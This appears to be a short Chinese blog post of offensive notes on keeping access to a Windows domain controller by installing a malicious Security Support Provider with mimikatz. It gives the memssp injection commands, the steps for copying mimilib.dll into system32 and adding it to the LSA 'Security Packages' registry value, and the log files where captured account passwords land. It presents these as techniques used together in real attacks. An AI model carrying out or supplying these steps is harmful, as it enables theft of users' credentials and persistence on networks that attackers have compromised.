权限维持:为攻击者创造出稳定的输出
域环境的权限维持、单机版的权限维持、web权限维持
#内网域-权限维持-基于验证DLL加载-SSP
启用mimikatz需要用管理员身份
方法一:但如果域控制器,被注入的内存的伪造的ssp将会丢失
privilege::debug
misc::memssp
C:\Windows\System32\mimilsa.log 记录登录的账号密码(前提条件是需要在线切换用户,且服务器不重启)
方法二:使用此方法即使系统重启,也不会影响到持久化的效果
1、mimilib.dll 传到目标域控的c:\windows\system32\目录下
2、修改注册表,重启生效
reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages"
reg add "HKLM\System\CurrentControlSet\Control\Lsa" /v "Security Packages" /d "kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u\0mimilib" /t REG_MULTI_SZ
c:\windows\system32\kiwissp.log 记录账号密码文件
在实战中一般都是将两种方法同时一起使用

1081

被折叠的 条评论
为什么被折叠?



